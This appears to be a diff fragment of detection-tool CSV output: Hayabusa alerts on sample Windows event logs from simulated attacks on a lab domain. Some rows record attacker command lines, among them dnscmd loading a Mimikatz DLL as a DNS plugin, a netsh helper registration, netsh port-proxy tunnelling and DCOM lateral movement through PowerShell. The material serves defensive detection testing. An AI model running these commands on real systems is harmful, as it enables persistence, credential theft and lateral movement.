+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
+2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-05-28 04:30:47.965 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
+2021-05-28 04:30:47.966 +09:00,jump01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
+2021-05-28 04:30:47.966 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
+2021-05-28 04:30:48.169 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
+2021-05-28 04:30:48.170 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
+2021-05-28 04:30:48.172 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
+2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-01 23:09:38.437 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \Microsoft\SynchronizeTimeZone | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.2"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <RegistrationInfo> <Date>2021-06-01T16:09:38.3707854</Date> <Author>OFFSEC\admmig</Author> <URI>\Microsoft\SynchronizeTimeZone</URI> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2021-06-01T16:09:35.8747701</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id=""Author""> <RunLevel>LeastPrivilege</RunLevel> <UserId>OFFSEC\admmig</UserId> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""Author""> <Exec> <Command>adf</Command> </Exec> </Actions> </Task> | User: admmig | LID: 0x46b7b4",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 22:05:20.242 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
+2021-06-03 22:05:40.097 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
